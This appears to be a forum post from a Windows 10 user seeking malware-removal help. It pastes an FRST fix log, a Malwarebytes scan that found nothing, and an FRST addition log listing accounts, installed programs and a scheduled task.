C:\Users\Lexi\Documents\BusinessCardShell - back.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\BusinessCardShell - back.png" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\BusinessCardShell - back.png" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\BusinessCardShell - back.png => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\feather.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\feather.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\feather.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\Guethler woordle.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\Guethler woordle.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\Guethler woordle.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\Guethler.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\Guethler.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\Guethler.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
 
=========  ipconfig /flushdns =========
 

Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 

=========  ipconfig /flushdns =========
 

Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 7.8 GB temporary data Removed.
 

The system needed a reboot.
 
==== End of Fixlog 10:12:12 ====


Ran Malwarebytes. Start Menu/Cortana/PowerShell will not load again. The log does not appear to be accurate, as it found around 117 things and moved them to the quarantine. They currently await in quarantine. I reran FRST as it seemed to give data on the status of Windows systems and am attaching those logs. Let me know if you want me to proceed with the other scans.

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/9/2016
Scan Time: 1:02 PM
Logfile:
Administrator: Yes

Version: 0.0.0.0000
Malware Database: v2016.03.09.05
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Lexi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 418314
Time Elapsed: 41 min, 1 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


Also, it says in the log above that rootkits were disabled, and I specifically checked that box as indicated in the instructions. I just checked and can see that it is still checked, but I am not able to paste a screenshot.

New Addition.txt below:

==================== Accounts: =============================

Administrator (S-1-5-21-2574262253-2623044021-4024016403-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2574262253-2623044021-4024016403-503 - Limited - Disabled)
Guest (S-1-5-21-2574262253-2623044021-4024016403-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2574262253-2623044021-4024016403-1002 - Limited - Enabled)
Lexi (S-1-5-21-2574262253-2623044021-4024016403-1001 - Administrator - Enabled) => C:\Users\Lexi

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ABBYY FineReader for ScanSnap 4.1 (HKLM-x32\...\{FB400000-0002-0000-0000-074957833700}) (Version: 8.02.380.7259 - ABBYY)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 18.0.0.144 - Adobe Systems Incorporated)
Adobe Digital Editions (HKLM-x32\...\Digital Editions) (Version:  - )
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.14) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.14 - Adobe Systems Incorporated)
Amazon Cloud Drive (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\23ab716f18849b6f) (Version: 2.1.2013.1340 - Amazon)
Amazon Kindle (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Amazon Kindle) (Version:  - Amazon)
Amazon Links (HKLM-x32\...\{3135D885-9D9A-4B4D-8D45-9DB05DA115CA}) (Version: 2.02 - TOSHIBA Corporation)
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Amazon Unbox Video (HKLM-x32\...\InstallShield_{54A4839E-87F8-4BD1-9682-A349E9943F0A}) (Version: 2.2.0.153 - Amazon.com)
Amazon Unbox Video (x32 Version: 2.2.0.153 - Amazon.com) Hidden
Apple Application Support (HKLM-x32\...\{B3575D00-27EF-49C2-B9E0-14B3D954E992}) (Version: 1.5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{439760BC-7737-4386-9B1D-A90A3E8A22EA}) (Version: 3.4.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Application X (HKLM-x32\...\Application X1.0) (Version:  - )
Audible Download Manager (HKLM-x32\...\AudibleDownloadManager) (Version: 6.6.0.12 - Audible, Inc.)
AudibleManager (HKLM-x32\...\AudibleManager) (Version: 1637796.2002539448.1402252320.32 - Audible, Inc.)
Avidemux 2.6 - 32 bits (32-bit) (HKLM-x32\...\Avidemux 2.6 - 32 bits) (Version: 2.6.9.00 - )
Bejeweled 2 Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)
BodyMedia SYNC (HKLM-x32\...\InstallShield_{99567851-B7F1-4692-A33A-0732E761220B}) (Version: 2.3.0.98 - BodyMedia, Inc.)
BodyMedia SYNC (x32 Version: 2.3.0.98 - BodyMedia, Inc.) Hidden
Bonjour (HKLM\...\{CA0D2F09-F811-48D4-843E-C87696C6A9D9}) (Version: 3.0.0.2 - Apple Inc.)
Brother MFL-Pro Suite MFC-685CW (HKLM-x32\...\{A3FEC306-FBFF-4B0D-95B9-F9C67C65079E}) (Version: 1.0.2.0 - Brother Industries, Ltd.)
CardMinder (HKLM-x32\...\{D4F2AFD3-0167-4464-B92F-78AB6DA8A0AA}) (Version: V4.1L10 - PFU)
CardMinder V4.1 (x32 Version: 4.1.10.1 - PFU) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Codecs for Windows 7 Pack 4.0.5 (HKLM-x32\...\Codecs for Windows 7 Pack) (Version: 4.0.5 - Codecs for Windows 7 Pack)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.3) (Version: 5.0.0.3 - Coupons.com Incorporated)
Cozi • FlyLady Edition (HKLM-x32\...\{6A40DDB9-D7B7-4C7E-9951-E3E8DE8A6B27}) (Version: 1.0.6029.37342 - Cozi Group, Inc.)
Craft ROBO Controller (HKLM-x32\...\{97D52BC9-D904-413F-A0F7-E3EE4C95B623}) (Version: 5.01 - Graphtec)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DLL Opener (HKLM-x32\...\DLL Opener) (Version: 0.1 - )
Duplicate Cleaner 2.0.6 (HKLM-x32\...\Duplicate Cleaner) (Version: 2.0.6 - DigitalVolcano)
Easy Thumbnails (Remove only) (HKLM-x32\...\Easy Thumbnails_is1) (Version: 3.0 - Fookes Software)
eDoc Organizer (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\fe1b84459eb7239d) (Version: 3.5.2.0 - eDoc LLC)
Escape Rosecliff Island (x32 Version: 2.2.0.82 - WildTangent) Hidden
Evernote v. 5.9.6 (HKLM-x32\...\{A542D366-9877-11E5-B101-005056951CAD}) (Version: 5.9.6.9494 - Evernote Corp.)
Family Tree Maker 2012 (HKLM-x32\...\Family Tree Maker 2012) (Version: 21.0.388 - Ancestry.com, Inc.)
Family Tree Maker 2012 (x32 Version: 21.0.388 - Ancestry.com, Inc.) Hidden
FATE - The Traitor Soul (x32 Version: 2.2.0.82 - WildTangent) Hidden
FileThis Fetch (HKLM-x32\...\{C087314D-EBFD-45B4-8073-A2D6592A4EE2}) (Version: 1.1.22 - FileThis)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 5.4.5.124 - Foxit Corporation)
Free AVI MPEG WMV MP4 FLV Video Joiner 8.7.1 (HKLM-x32\...\Free AVI MPEG WMV MP4 FLV Video Joiner_is1) (Version:  - FreeAudioVideoSoftTech, Inc.)
Garmin POI Loader (HKLM-x32\...\{4AF7F4F9-AEFE-4183-B333-BEDDD193339A}) (Version: 2.7.1 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
Garmin WebUpdater (HKLM-x32\...\{00FE2935-FB56-4410-AB5F-D6E70C1771D2}) (Version: 2.5.6 - Garmin Ltd or its subsidiaries)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Gears (HKLM-x32\...\{2FA41EBB-3F5A-35C3-85D6-51EC72A11FBD}) (Version: 0.5.3600 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7210.1528 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HandBrake 0.9.8 (HKLM-x32\...\HandBrake) (Version: 0.9.8 - )
Helium (HKLM-x32\...\{9A781940-AC41-4D5E-8E1E-76A04B916FB9}) (Version: 1.0.0 - ClockworkMod)
Intel Driver Update Utility (HKLM-x32\...\{ca4bc3a8-b99c-4416-90d8-351a8ceab458}) (Version: 2.2.0.2 - Intel)
Intel® Driver Update Utility 2.2 (x32 Version: 2.2.0.1 - Intel) Hidden
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.5.7.1002 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{997C9EC4-B53D-479D-81B7-0AEC8D174BA1}) (Version: 10.4.1.10 - Apple Inc.)
Java 7 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417025FF}) (Version: 7.0.250 - Oracle)
Java 6 Update 17 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Jewel Quest 3 (x32 Version: 2.2.0.82 - WildTangent) Hidden
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.44.1 - JMicron Technology Corp.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Keyboarding Without Tears (HKLM-x32\...\Keyboarding-Without-Tears) (Version: 1.0 - UNKNOWN)
Keyboarding Without Tears (x32 Version: 1.0 - UNKNOWN) Hidden
Label@Once 1.0 (HKLM-x32\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
LeapFrog Connect (HKLM-x32\...\UPCShell) (Version: 6.0.19.19317 - LeapFrog)
LeapFrog Connect (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Leapster Explorer Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog My Pals Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog MyOwnStoryTimePad Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Tag Junior Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LeapFrog Tag Plugin (x32 Version: 6.0.19.19317 - LeapFrog) Hidden
LG Verizon United Drivers (HKLM-x32\...\{885DBC42-4BCC-4A7E-9F2B-64B25E02E926}) (Version: 2.6.0 - LG Electronics)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM-x32\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Picture It! Photo Premium 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MotoHelper MergeModules (x32 Version: 1.0.0 - Motorola) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OverDrive Media Console (HKLM-x32\...\{D07205E7-F6D3-4333-AFCC-782A07685B72}) (Version: 3.2.20 - OverDrive, Inc.)
Penguins! (x32 Version: 2.2.0.82 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Polar Bowler (x32 Version: 2.2.0.82 - WildTangent) Hidden
Quick Web Player (HKLM-x32\...\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1) (Version:  - )
QuickTime (HKLM-x32\...\{C9E14402-3631-4182-B377-6B0DFB1C0339}) (Version: 7.70.80.34 - Apple Inc.)
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.20.503.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7572 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0013 - REALTEK Semiconductor Corp.)
ROBO Master (HKLM-x32\...\{44E8FA6E-931D-4755-82DA-DB93CE1F238C}) (Version: 5.10.0 - Graphtec)
ScanSnap (x32 Version: 5.1.11.1 - PFU Limited) Hidden
ScanSnap (x32 Version: 5.1.62.2 - PFU Limited) Hidden
ScanSnap Manager (HKLM-x32\...\{DBCDB997-EEEB-4BE9-BAFF-26B4094DBDE6}) (Version: V5.1L62 - PFU)
ScanSnap Organizer (HKLM-x32\...\{E58F3B88-3B3E-4F85-9323-04789D979C15}) (Version: V4.1L11 - PFU)
ScanSnap Organizer (x32 Version: 4.1.11.18 - PFU LIMITED) Hidden
Scholastic eReader Support Files (HKLM-x32\...\{0DBAE82C-E2D0-418E-8DA2-4D2F54CC1C58}) (Version: 1.1.4246 - Scholastic)
Screen Recorder Launcher (HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\ScreenRecorderLauncher) (Version: 2.0 - )
Secure Online Account Numbers (HKLM-x32\...\{65980EBF-C4B5-4555-823A-94DB7F709E53}) (Version: 2.3.14.0 - Discover)
Secure Online Account Numbers (x32 Version: 2.0.2.0 - Discover) Hidden
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Shop'NCook Menu version 4.0.14 (HKLM-x32\...\{7B2A623E-AF79-4C51-9843-62C0C5D45F74}_is1) (Version: 4.0.14 - Rufenacht Innovative)
Shop'NCook Reader version 4.0.16 (HKLM-x32\...\{4F741F80-FCCF-4D9D-AADF-EF010DBABD49}_is1) (Version: 4.0.16 - Rufenacht Innovative)
SimpleOCR 3.1 (HKLM-x32\...\SimpleOCR 3.1) (Version:  - )
Skitch (HKLM-x32\...\Skitch 2.3.0.10) (Version: 2.3.0.10 - Evernote Corp.)
Skype Launcher (HKLM-x32\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Skype Toolbars (HKLM-x32\...\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}) (Version: 5.0.4137 - Skype Technologies S.A.)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Storia (HKLM-x32\...\{D74EB870-4745-467B-9430-DA53A604A456}) (Version: 1.1.4246 - Scholastic)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.10.0 - Synaptics Incorporated)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.1 - TOSHIBA)
TOSHIBA Assist (HKLM-x32\...\{1B87C40B-A60B-4EF3-9A68-706CF4B69978}) (Version: 3.00.11 - TOSHIBA CORPORATION)
TOSHIBA Bulletin Board (HKLM-x32\...\InstallShield_{C14518AF-1A0F-4D39-8011-69BAA01CD380}) (Version: 1.6.07.64 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 for x64 - TOSHIBA Corporation)
TOSHIBA DVD PLAYER (HKLM-x32\...\{6C5F3BDC-0A1B-4436-A696-5939629D5C31}) (Version: 3.01.2.12-A - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM-x32\...\InstallShield_{B3FF1CD9-B2F0-4D71-BB55-5F580401C48E}) (Version: 1.2.11.64 - TOSHIBA Corporation)
TOSHIBA Face Recognition (HKLM-x32\...\InstallShield_{F67FA545-D8E5-4209-86B1-AEE045D1003F}) (Version: 3.1.3.64 - TOSHIBA Corporation)
TOSHIBA Flash Cards Support Utility (HKLM-x32\...\InstallShield_{620BBA5E-F848-4D56-8BDA-584E44584C5E}) (Version: 1.63.0.6C - TOSHIBA CORPORATION)
TOSHIBA Hardware Setup (HKLM-x32\...\InstallShield_{5279374D-87FE-4879-9385-F17278EBB9D3}) (Version: 1.63.0.26C - TOSHIBA CORPORATION)
TOSHIBA HDD Protection (HKLM\...\{94A90C69-71C1-470A-88F5-AA47ECC96B40}) (Version: 2.2.0.4 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM-x32\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.6 - TOSHIBA Corporation)
Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.3.198 - Symantec Corporation)
TOSHIBA Media Controller (HKLM-x32\...\{983CD6FE-8320-4B80-A8F6-0D0366E0AA22}) (Version: 1.0.80.3.64 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.2.0.38 - Toshiba)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.6.0.64 - TOSHIBA Corporation)
TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.3 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 for x64 - TOSHIBA Corporation)
TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{A0E99122-25C1-4CA4-9063-499A2A814EB6}) (Version: 1.6.06.64 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.1.40 - TOSHIBA)
TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.1.1 - TOSHIBA Corporation)
TOSHIBA Supervisor Password (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.0.9C - TOSHIBA CORPORATION)
TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.3.4.64 - TOSHIBA Corporation)
TOSHIBA Web Camera Application (HKLM-x32\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
ToshibaRegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.4 - Toshiba)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Leapster Explorer Plugin) (HKLM-x32\...\LeapsterExplorerPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog My Pals Plugin) (HKLM-x32\...\MyPalsPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog MyOwnStoryTimePad Plugin) (HKLM-x32\...\MyOwnStoryTimePadPlugin) (Version: 6.0.19.19317 - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Tag Junior Plugin) (HKLM-x32\...\TagJuniorPlugin) (Version:  - LeapFrog)
Use the entry named LeapFrog Connect to uninstall (LeapFrog Tag Plugin) (HKLM-x32\...\TagPlugin) (Version: 6.0.19.19317 - LeapFrog)
Utility Common Driver (x32 Version: 1.0.52.1C - TOSHIBA) Hidden
Virtual Families (x32 Version: 2.2.0.82 - WildTangent) Hidden
Virtual Villagers - The Secret City (x32 Version: 2.2.0.82 - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.0.80 - WildTangent)
WildTangent ORB Game Console (x32 Version:  - WildTangent) Hidden
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - LeapFrog (FlyUsb) USB  (11/05/2008 1.1.1.0) (HKLM\...\781745E87AFF80C0C1388CFF79D19ECAB2E9BB47) (Version: 11/05/2008 1.1.1.0 - LeapFrog)
Windows Driver Package - Leapfrog (Leapfrog-USBLAN) Net  (09/10/2009 02.03.05.012) (HKLM\...\8F14F2ECEDE68D26EA515B48DC25B39103C4FE8D) (Version: 09/10/2009 02.03.05.012 - Leapfrog)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
Zuma's Revenge (x32 Version: 2.2.0.82 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Lexi\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0339290B-4D0B-431D-A454-94460BABBE1F} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
